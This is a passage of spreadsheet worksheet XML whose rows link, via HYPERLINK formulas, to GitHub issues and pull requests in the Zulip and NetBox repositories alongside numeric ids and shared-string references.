        <f>HYPERLINK("https://github.com/zulip/zulip/issues/18665", "https://github.com/zulip/zulip/issues/18665")</f>
        <v>https://github.com/zulip/zulip/issues/18665</v>
      </c>
    </row>
    <row r="84" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A84">
        <v>150</v>
      </c>
      <c r="B84" t="s">
        <v>53</v>
      </c>
      <c r="C84" t="s">
        <v>113</v>
      </c>
      <c r="D84" t="s">
        <v>10</v>
      </c>
      <c r="E84" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/18665", "https://github.com/zulip/zulip/issues/18665")</f>
        <v>https://github.com/zulip/zulip/issues/18665</v>
      </c>
    </row>
    <row r="85" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A85">
        <v>151</v>
      </c>
      <c r="B85" t="s">
        <v>11</v>
      </c>
      <c r="C85" t="s">
        <v>114</v>
      </c>
      <c r="D85" t="s">
        <v>10</v>
      </c>
      <c r="E85" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19056", "https://github.com/zulip/zulip/issues/19056")</f>
        <v>https://github.com/zulip/zulip/issues/19056</v>
      </c>
    </row>
    <row r="86" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A86">
        <v>152</v>
      </c>
      <c r="B86" t="s">
        <v>65</v>
      </c>
      <c r="C86" t="s">
        <v>114</v>
      </c>
      <c r="D86" t="s">
        <v>10</v>
      </c>
      <c r="E86" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/19056", "https://github.com/zulip/zulip/issues/19056")</f>
        <v>https://github.com/zulip/zulip/issues/19056</v>
      </c>
    </row>
    <row r="87" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A87">
        <v>155</v>
      </c>
      <c r="B87" t="s">
        <v>17</v>
      </c>
      <c r="C87" t="s">
        <v>115</v>
      </c>
      <c r="D87" t="s">
        <v>10</v>
      </c>
      <c r="E87" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19513", "https://github.com/zulip/zulip/pull/19513")</f>
        <v>https://github.com/zulip/zulip/pull/19513</v>
      </c>
    </row>
    <row r="88" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A88">
        <v>156</v>
      </c>
      <c r="B88" t="s">
        <v>8</v>
      </c>
      <c r="C88" t="s">
        <v>116</v>
      </c>
      <c r="D88" t="s">
        <v>10</v>
      </c>
      <c r="E88" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19586", "https://github.com/zulip/zulip/pull/19586")</f>
        <v>https://github.com/zulip/zulip/pull/19586</v>
      </c>
    </row>
    <row r="89" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>157</v>
      </c>
      <c r="B89" t="s">
        <v>53</v>
      </c>
      <c r="C89" t="s">
        <v>117</v>
      </c>
      <c r="D89" t="s">
        <v>10</v>
      </c>
      <c r="E89" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19673", "https://github.com/zulip/zulip/pull/19673")</f>
        <v>https://github.com/zulip/zulip/pull/19673</v>
      </c>
    </row>
    <row r="90" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>158</v>
      </c>
      <c r="B90" t="s">
        <v>29</v>
      </c>
      <c r="C90" t="s">
        <v>118</v>
      </c>
      <c r="D90" t="s">
        <v>10</v>
      </c>
      <c r="E90" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/19771", "https://github.com/zulip/zulip/pull/19771")</f>
        <v>https://github.com/zulip/zulip/pull/19771</v>
      </c>
    </row>
    <row r="91" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>161</v>
      </c>
      <c r="B91" t="s">
        <v>53</v>
      </c>
      <c r="C91" t="s">
        <v>119</v>
      </c>
      <c r="D91" t="s">
        <v>10</v>
      </c>
      <c r="E91" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20136", "https://github.com/zulip/zulip/pull/20136")</f>
        <v>https://github.com/zulip/zulip/pull/20136</v>
      </c>
    </row>
    <row r="92" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>162</v>
      </c>
      <c r="B92" t="s">
        <v>8</v>
      </c>
      <c r="C92" t="s">
        <v>120</v>
      </c>
      <c r="D92" t="s">
        <v>10</v>
      </c>
      <c r="E92" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20136", "https://github.com/zulip/zulip/pull/20136")</f>
        <v>https://github.com/zulip/zulip/pull/20136</v>
      </c>
    </row>
    <row r="93" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>164</v>
      </c>
      <c r="B93" t="s">
        <v>17</v>
      </c>
      <c r="C93" t="s">
        <v>121</v>
      </c>
      <c r="D93" t="s">
        <v>10</v>
      </c>
      <c r="E93" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20136", "https://github.com/zulip/zulip/pull/20136")</f>
        <v>https://github.com/zulip/zulip/pull/20136</v>
      </c>
    </row>
    <row r="94" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>171</v>
      </c>
      <c r="B94" t="s">
        <v>42</v>
      </c>
      <c r="C94" t="s">
        <v>122</v>
      </c>
      <c r="D94" t="s">
        <v>10</v>
      </c>
      <c r="E94" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20464", "https://github.com/zulip/zulip/pull/20464")</f>
        <v>https://github.com/zulip/zulip/pull/20464</v>
      </c>
    </row>
    <row r="95" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>172</v>
      </c>
      <c r="B95" t="s">
        <v>82</v>
      </c>
      <c r="C95" t="s">
        <v>123</v>
      </c>
      <c r="D95" t="s">
        <v>10</v>
      </c>
      <c r="E95" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/20490", "https://github.com/zulip/zulip/issues/20490")</f>
        <v>https://github.com/zulip/zulip/issues/20490</v>
      </c>
    </row>
    <row r="96" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>173</v>
      </c>
      <c r="B96" t="s">
        <v>82</v>
      </c>
      <c r="C96" t="s">
        <v>124</v>
      </c>
      <c r="D96" t="s">
        <v>10</v>
      </c>
      <c r="E96" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/20550", "https://github.com/zulip/zulip/issues/20550")</f>
        <v>https://github.com/zulip/zulip/issues/20550</v>
      </c>
    </row>
    <row r="97" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>174</v>
      </c>
      <c r="B97" t="s">
        <v>17</v>
      </c>
      <c r="C97" t="s">
        <v>125</v>
      </c>
      <c r="D97" t="s">
        <v>10</v>
      </c>
      <c r="E97" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20738", "https://github.com/zulip/zulip/pull/20738")</f>
        <v>https://github.com/zulip/zulip/pull/20738</v>
      </c>
    </row>
    <row r="98" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>175</v>
      </c>
      <c r="B98" t="s">
        <v>126</v>
      </c>
      <c r="C98" t="s">
        <v>125</v>
      </c>
      <c r="D98" t="s">
        <v>10</v>
      </c>
      <c r="E98" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/20738", "https://github.com/zulip/zulip/pull/20738")</f>
        <v>https://github.com/zulip/zulip/pull/20738</v>
      </c>
    </row>
    <row r="99" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>178</v>
      </c>
      <c r="B99" t="s">
        <v>29</v>
      </c>
      <c r="C99" t="s">
        <v>127</v>
      </c>
      <c r="D99" t="s">
        <v>10</v>
      </c>
      <c r="E99" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/22212", "https://github.com/zulip/zulip/issues/22212")</f>
        <v>https://github.com/zulip/zulip/issues/22212</v>
      </c>
    </row>
    <row r="100" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A100">
        <v>179</v>
      </c>
      <c r="B100" t="s">
        <v>8</v>
      </c>
      <c r="C100" t="s">
        <v>128</v>
      </c>
      <c r="D100" t="s">
        <v>10</v>
      </c>
      <c r="E100" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22605", "https://github.com/zulip/zulip/pull/22605")</f>
        <v>https://github.com/zulip/zulip/pull/22605</v>
      </c>
    </row>
    <row r="101" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A101">
        <v>180</v>
      </c>
      <c r="B101" t="s">
        <v>48</v>
      </c>
      <c r="C101" t="s">
        <v>129</v>
      </c>
      <c r="D101" t="s">
        <v>10</v>
      </c>
      <c r="E101" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22647", "https://github.com/zulip/zulip/pull/22647")</f>
        <v>https://github.com/zulip/zulip/pull/22647</v>
      </c>
    </row>
    <row r="102" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A102">
        <v>181</v>
      </c>
      <c r="B102" t="s">
        <v>17</v>
      </c>
      <c r="C102" t="s">
        <v>130</v>
      </c>
      <c r="D102" t="s">
        <v>10</v>
      </c>
      <c r="E102" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22647", "https://github.com/zulip/zulip/pull/22647")</f>
        <v>https://github.com/zulip/zulip/pull/22647</v>
      </c>
    </row>
    <row r="103" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A103">
        <v>187</v>
      </c>
      <c r="B103" t="s">
        <v>17</v>
      </c>
      <c r="C103" t="s">
        <v>131</v>
      </c>
      <c r="D103" t="s">
        <v>10</v>
      </c>
      <c r="E103" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22648", "https://github.com/zulip/zulip/pull/22648")</f>
        <v>https://github.com/zulip/zulip/pull/22648</v>
      </c>
    </row>
    <row r="104" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A104">
        <v>188</v>
      </c>
      <c r="B104" t="s">
        <v>8</v>
      </c>
      <c r="C104" t="s">
        <v>131</v>
      </c>
      <c r="D104" t="s">
        <v>10</v>
      </c>
      <c r="E104" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22648", "https://github.com/zulip/zulip/pull/22648")</f>
        <v>https://github.com/zulip/zulip/pull/22648</v>
      </c>
    </row>
    <row r="105" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A105">
        <v>189</v>
      </c>
      <c r="B105" t="s">
        <v>53</v>
      </c>
      <c r="C105" t="s">
        <v>132</v>
      </c>
      <c r="D105" t="s">
        <v>10</v>
      </c>
      <c r="E105" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22808", "https://github.com/zulip/zulip/pull/22808")</f>
        <v>https://github.com/zulip/zulip/pull/22808</v>
      </c>
    </row>
    <row r="106" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A106">
        <v>190</v>
      </c>
      <c r="B106" t="s">
        <v>17</v>
      </c>
      <c r="C106" t="s">
        <v>133</v>
      </c>
      <c r="D106" t="s">
        <v>10</v>
      </c>
      <c r="E106" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22956", "https://github.com/zulip/zulip/pull/22956")</f>
        <v>https://github.com/zulip/zulip/pull/22956</v>
      </c>
    </row>
    <row r="107" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A107">
        <v>191</v>
      </c>
      <c r="B107" t="s">
        <v>29</v>
      </c>
      <c r="C107" t="s">
        <v>134</v>
      </c>
      <c r="D107" t="s">
        <v>10</v>
      </c>
      <c r="E107" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22988", "https://github.com/zulip/zulip/pull/22988")</f>
        <v>https://github.com/zulip/zulip/pull/22988</v>
      </c>
    </row>
    <row r="108" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A108">
        <v>192</v>
      </c>
      <c r="B108" t="s">
        <v>8</v>
      </c>
      <c r="C108" t="s">
        <v>135</v>
      </c>
      <c r="D108" t="s">
        <v>10</v>
      </c>
      <c r="E108" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/22988", "https://github.com/zulip/zulip/pull/22988")</f>
        <v>https://github.com/zulip/zulip/pull/22988</v>
      </c>
    </row>
    <row r="109" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A109">
        <v>194</v>
      </c>
      <c r="B109" t="s">
        <v>42</v>
      </c>
      <c r="C109" t="s">
        <v>136</v>
      </c>
      <c r="D109" t="s">
        <v>10</v>
      </c>
      <c r="E109" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24040", "https://github.com/zulip/zulip/issues/24040")</f>
        <v>https://github.com/zulip/zulip/issues/24040</v>
      </c>
    </row>
    <row r="110" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A110">
        <v>195</v>
      </c>
      <c r="B110" t="s">
        <v>8</v>
      </c>
      <c r="C110" t="s">
        <v>137</v>
      </c>
      <c r="D110" t="s">
        <v>10</v>
      </c>
      <c r="E110" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24118", "https://github.com/zulip/zulip/issues/24118")</f>
        <v>https://github.com/zulip/zulip/issues/24118</v>
      </c>
    </row>
    <row r="111" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A111">
        <v>196</v>
      </c>
      <c r="B111" t="s">
        <v>17</v>
      </c>
      <c r="C111" t="s">
        <v>138</v>
      </c>
      <c r="D111" t="s">
        <v>10</v>
      </c>
      <c r="E111" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/24176", "https://github.com/zulip/zulip/pull/24176")</f>
        <v>https://github.com/zulip/zulip/pull/24176</v>
      </c>
    </row>
    <row r="112" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A112">
        <v>197</v>
      </c>
      <c r="B112" t="s">
        <v>126</v>
      </c>
      <c r="C112" t="s">
        <v>139</v>
      </c>
      <c r="D112" t="s">
        <v>10</v>
      </c>
      <c r="E112" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24242", "https://github.com/zulip/zulip/issues/24242")</f>
        <v>https://github.com/zulip/zulip/issues/24242</v>
      </c>
    </row>
    <row r="113" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A113">
        <v>198</v>
      </c>
      <c r="B113" t="s">
        <v>140</v>
      </c>
      <c r="C113" t="s">
        <v>139</v>
      </c>
      <c r="D113" t="s">
        <v>10</v>
      </c>
      <c r="E113" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24242", "https://github.com/zulip/zulip/issues/24242")</f>
        <v>https://github.com/zulip/zulip/issues/24242</v>
      </c>
    </row>
    <row r="114" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A114">
        <v>199</v>
      </c>
      <c r="B114" t="s">
        <v>8</v>
      </c>
      <c r="C114" t="s">
        <v>141</v>
      </c>
      <c r="D114" t="s">
        <v>10</v>
      </c>
      <c r="E114" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24242", "https://github.com/zulip/zulip/issues/24242")</f>
        <v>https://github.com/zulip/zulip/issues/24242</v>
      </c>
    </row>
    <row r="115" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A115">
        <v>200</v>
      </c>
      <c r="B115" t="s">
        <v>17</v>
      </c>
      <c r="C115" t="s">
        <v>141</v>
      </c>
      <c r="D115" t="s">
        <v>10</v>
      </c>
      <c r="E115" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24242", "https://github.com/zulip/zulip/issues/24242")</f>
        <v>https://github.com/zulip/zulip/issues/24242</v>
      </c>
    </row>
    <row r="116" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A116">
        <v>205</v>
      </c>
      <c r="B116" t="s">
        <v>53</v>
      </c>
      <c r="C116" t="s">
        <v>142</v>
      </c>
      <c r="D116" t="s">
        <v>10</v>
      </c>
      <c r="E116" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24242", "https://github.com/zulip/zulip/issues/24242")</f>
        <v>https://github.com/zulip/zulip/issues/24242</v>
      </c>
    </row>
    <row r="117" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A117">
        <v>207</v>
      </c>
      <c r="B117" t="s">
        <v>17</v>
      </c>
      <c r="C117" t="s">
        <v>143</v>
      </c>
      <c r="D117" t="s">
        <v>10</v>
      </c>
      <c r="E117" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24269", "https://github.com/zulip/zulip/issues/24269")</f>
        <v>https://github.com/zulip/zulip/issues/24269</v>
      </c>
    </row>
    <row r="118" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A118">
        <v>210</v>
      </c>
      <c r="B118" t="s">
        <v>8</v>
      </c>
      <c r="C118" t="s">
        <v>144</v>
      </c>
      <c r="D118" t="s">
        <v>10</v>
      </c>
      <c r="E118" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/24269", "https://github.com/zulip/zulip/issues/24269")</f>
        <v>https://github.com/zulip/zulip/issues/24269</v>
      </c>
    </row>
    <row r="119" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A119">
        <v>220</v>
      </c>
      <c r="B119" t="s">
        <v>145</v>
      </c>
      <c r="C119" t="s">
        <v>146</v>
      </c>
      <c r="D119" t="s">
        <v>10</v>
      </c>
      <c r="E119" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/25103", "https://github.com/zulip/zulip/pull/25103")</f>
        <v>https://github.com/zulip/zulip/pull/25103</v>
      </c>
    </row>
    <row r="120" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A120">
        <v>221</v>
      </c>
      <c r="B120" t="s">
        <v>82</v>
      </c>
      <c r="C120" t="s">
        <v>147</v>
      </c>
      <c r="D120" t="s">
        <v>10</v>
      </c>
      <c r="E120" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/25488", "https://github.com/zulip/zulip/issues/25488")</f>
        <v>https://github.com/zulip/zulip/issues/25488</v>
      </c>
    </row>
    <row r="121" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A121">
        <v>223</v>
      </c>
      <c r="B121" t="s">
        <v>42</v>
      </c>
      <c r="C121" t="s">
        <v>148</v>
      </c>
      <c r="D121" t="s">
        <v>10</v>
      </c>
      <c r="E121" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/25843", "https://github.com/zulip/zulip/pull/25843")</f>
        <v>https://github.com/zulip/zulip/pull/25843</v>
      </c>
    </row>
    <row r="122" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A122">
        <v>224</v>
      </c>
      <c r="B122" t="s">
        <v>42</v>
      </c>
      <c r="C122" t="s">
        <v>149</v>
      </c>
      <c r="D122" t="s">
        <v>10</v>
      </c>
      <c r="E122" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/25848", "https://github.com/zulip/zulip/pull/25848")</f>
        <v>https://github.com/zulip/zulip/pull/25848</v>
      </c>
    </row>
    <row r="123" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A123">
        <v>226</v>
      </c>
      <c r="B123" t="s">
        <v>42</v>
      </c>
      <c r="C123" t="s">
        <v>150</v>
      </c>
      <c r="D123" t="s">
        <v>10</v>
      </c>
      <c r="E123" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/26451", "https://github.com/zulip/zulip/pull/26451")</f>
        <v>https://github.com/zulip/zulip/pull/26451</v>
      </c>
    </row>
    <row r="124" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A124">
        <v>228</v>
      </c>
      <c r="B124" t="s">
        <v>53</v>
      </c>
      <c r="C124" t="s">
        <v>151</v>
      </c>
      <c r="D124" t="s">
        <v>10</v>
      </c>
      <c r="E124" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/26764", "https://github.com/zulip/zulip/pull/26764")</f>
        <v>https://github.com/zulip/zulip/pull/26764</v>
      </c>
    </row>
    <row r="125" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A125">
        <v>231</v>
      </c>
      <c r="B125" t="s">
        <v>152</v>
      </c>
      <c r="C125" t="s">
        <v>153</v>
      </c>
      <c r="D125" t="s">
        <v>10</v>
      </c>
      <c r="E125" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/28272", "https://github.com/zulip/zulip/issues/28272")</f>
        <v>https://github.com/zulip/zulip/issues/28272</v>
      </c>
    </row>
    <row r="126" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A126">
        <v>232</v>
      </c>
      <c r="B126" t="s">
        <v>42</v>
      </c>
      <c r="C126" t="s">
        <v>154</v>
      </c>
      <c r="D126" t="s">
        <v>10</v>
      </c>
      <c r="E126" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/28488", "https://github.com/zulip/zulip/pull/28488")</f>
        <v>https://github.com/zulip/zulip/pull/28488</v>
      </c>
    </row>
    <row r="127" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A127">
        <v>236</v>
      </c>
      <c r="B127" t="s">
        <v>40</v>
      </c>
      <c r="C127" t="s">
        <v>155</v>
      </c>
      <c r="D127" t="s">
        <v>10</v>
      </c>
      <c r="E127" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29302", "https://github.com/zulip/zulip/pull/29302")</f>
        <v>https://github.com/zulip/zulip/pull/29302</v>
      </c>
    </row>
    <row r="128" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A128">
        <v>237</v>
      </c>
      <c r="B128" t="s">
        <v>29</v>
      </c>
      <c r="C128" t="s">
        <v>156</v>
      </c>
      <c r="D128" t="s">
        <v>10</v>
      </c>
      <c r="E128" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/29318", "https://github.com/zulip/zulip/issues/29318")</f>
        <v>https://github.com/zulip/zulip/issues/29318</v>
      </c>
    </row>
    <row r="129" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A129">
        <v>238</v>
      </c>
      <c r="B129" t="s">
        <v>17</v>
      </c>
      <c r="C129" t="s">
        <v>157</v>
      </c>
      <c r="D129" t="s">
        <v>10</v>
      </c>
      <c r="E129" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29326", "https://github.com/zulip/zulip/pull/29326")</f>
        <v>https://github.com/zulip/zulip/pull/29326</v>
      </c>
    </row>
    <row r="130" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A130">
        <v>239</v>
      </c>
      <c r="B130" t="s">
        <v>42</v>
      </c>
      <c r="C130" t="s">
        <v>158</v>
      </c>
      <c r="D130" t="s">
        <v>10</v>
      </c>
      <c r="E130" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/29383", "https://github.com/zulip/zulip/pull/29383")</f>
        <v>https://github.com/zulip/zulip/pull/29383</v>
      </c>
    </row>
    <row r="131" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A131">
        <v>242</v>
      </c>
      <c r="B131" t="s">
        <v>8</v>
      </c>
      <c r="C131" t="s">
        <v>159</v>
      </c>
      <c r="D131" t="s">
        <v>10</v>
      </c>
      <c r="E131" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30454", "https://github.com/zulip/zulip/pull/30454")</f>
        <v>https://github.com/zulip/zulip/pull/30454</v>
      </c>
    </row>
    <row r="132" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A132">
        <v>243</v>
      </c>
      <c r="B132" t="s">
        <v>96</v>
      </c>
      <c r="C132" t="s">
        <v>160</v>
      </c>
      <c r="D132" t="s">
        <v>10</v>
      </c>
      <c r="E132" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30807", "https://github.com/zulip/zulip/pull/30807")</f>
        <v>https://github.com/zulip/zulip/pull/30807</v>
      </c>
    </row>
    <row r="133" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A133">
        <v>245</v>
      </c>
      <c r="B133" t="s">
        <v>11</v>
      </c>
      <c r="C133" t="s">
        <v>161</v>
      </c>
      <c r="D133" t="s">
        <v>162</v>
      </c>
      <c r="E133" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/141", "https://github.com/netbox-community/netbox/issues/141")</f>
        <v>https://github.com/netbox-community/netbox/issues/141</v>
      </c>
      <c r="F133" t="s">
        <v>815</v>
      </c>
      <c r="H133" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="134" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A134">
        <v>246</v>
      </c>
      <c r="B134" t="s">
        <v>65</v>
      </c>
      <c r="C134" t="s">
        <v>163</v>
      </c>
      <c r="D134" t="s">
        <v>162</v>
      </c>
      <c r="E134" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/141", "https://github.com/netbox-community/netbox/issues/141")</f>
        <v>https://github.com/netbox-community/netbox/issues/141</v>
      </c>
      <c r="F134" t="s">
        <v>815</v>
      </c>
      <c r="H134" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="135" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A135">
        <v>247</v>
      </c>
      <c r="B135" t="s">
        <v>11</v>
      </c>
      <c r="C135" t="s">
        <v>164</v>
      </c>
      <c r="D135" t="s">
        <v>162</v>
      </c>
      <c r="E135" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/905", "https://github.com/netbox-community/netbox/issues/905")</f>
        <v>https://github.com/netbox-community/netbox/issues/905</v>
      </c>
      <c r="F135" t="s">
        <v>815</v>
      </c>
      <c r="H135" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="136" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A136">
        <v>248</v>
      </c>
      <c r="B136" t="s">
        <v>65</v>
      </c>
      <c r="C136" t="s">
        <v>165</v>
      </c>
      <c r="D136" t="s">
        <v>162</v>
      </c>
      <c r="E136" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/905", "https://github.com/netbox-community/netbox/issues/905")</f>
        <v>https://github.com/netbox-community/netbox/issues/905</v>
      </c>
      <c r="F136" t="s">
        <v>815</v>
      </c>
      <c r="H136" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="137" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A137">
        <v>249</v>
      </c>
      <c r="B137" t="s">
        <v>11</v>
      </c>
      <c r="C137" t="s">
        <v>166</v>
      </c>
      <c r="D137" t="s">
        <v>162</v>
      </c>
      <c r="E137" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/1243", "https://github.com/netbox-community/netbox/issues/1243")</f>
        <v>https://github.com/netbox-community/netbox/issues/1243</v>
      </c>
      <c r="F137" t="s">
        <v>815</v>
      </c>
      <c r="H137" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="138" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A138">
        <v>250</v>
      </c>
      <c r="B138" t="s">
        <v>65</v>
      </c>
      <c r="C138" t="s">
        <v>167</v>
      </c>
      <c r="D138" t="s">
        <v>162</v>
      </c>
      <c r="E138" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/1243", "https://github.com/netbox-community/netbox/issues/1243")</f>
        <v>https://github.com/netbox-community/netbox/issues/1243</v>
      </c>
      <c r="F138" t="s">
        <v>815</v>
      </c>
      <c r="H138" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="139" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A139">
        <v>251</v>
      </c>
      <c r="B139" t="s">
        <v>11</v>
      </c>
      <c r="C139" t="s">
        <v>168</v>
      </c>
      <c r="D139" t="s">
        <v>162</v>
      </c>
      <c r="E139" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/1388", "https://github.com/netbox-community/netbox/issues/1388")</f>
        <v>https://github.com/netbox-community/netbox/issues/1388</v>
      </c>
      <c r="F139" t="s">
        <v>815</v>
      </c>
      <c r="G139" t="s">
        <v>858</v>
      </c>
      <c r="H139" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="140" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A140">
        <v>252</v>
      </c>
      <c r="B140" t="s">
        <v>65</v>
      </c>
      <c r="C140" t="s">
        <v>168</v>
      </c>
      <c r="D140" t="s">
        <v>162</v>
      </c>
      <c r="E140" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/1388", "https://github.com/netbox-community/netbox/issues/1388")</f>
        <v>https://github.com/netbox-community/netbox/issues/1388</v>
      </c>
      <c r="F140" t="s">
        <v>815</v>
      </c>
      <c r="H140" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="141" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A141">
        <v>255</v>
      </c>
      <c r="B141" t="s">
        <v>11</v>
      </c>
      <c r="C141" t="s">
        <v>169</v>
      </c>
      <c r="D141" t="s">
        <v>162</v>
      </c>
      <c r="E141" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2621", "https://github.com/netbox-community/netbox/issues/2621")</f>
        <v>https://github.com/netbox-community/netbox/issues/2621</v>
      </c>
      <c r="F141" t="s">
        <v>815</v>
      </c>
      <c r="H141" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="142" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A142">
        <v>256</v>
      </c>
      <c r="B142" t="s">
        <v>65</v>
      </c>
      <c r="C142" t="s">
        <v>170</v>
      </c>
      <c r="D142" t="s">
        <v>162</v>
      </c>
      <c r="E142" t="str">
        <f>HYPERLINK("https://github.com/netbox-community/netbox/issues/2621", "https://github.com/netbox-community/netbox/issues/2621")</f>
        <v>https://github.com/netbox-community/netbox/issues/2621</v>
      </c>
      <c r="F142" t="s">
        <v>815</v>
      </c>
      <c r="H142" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="143" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A143">
        <v>257</v>
      </c>
      <c r="B143" t="s">
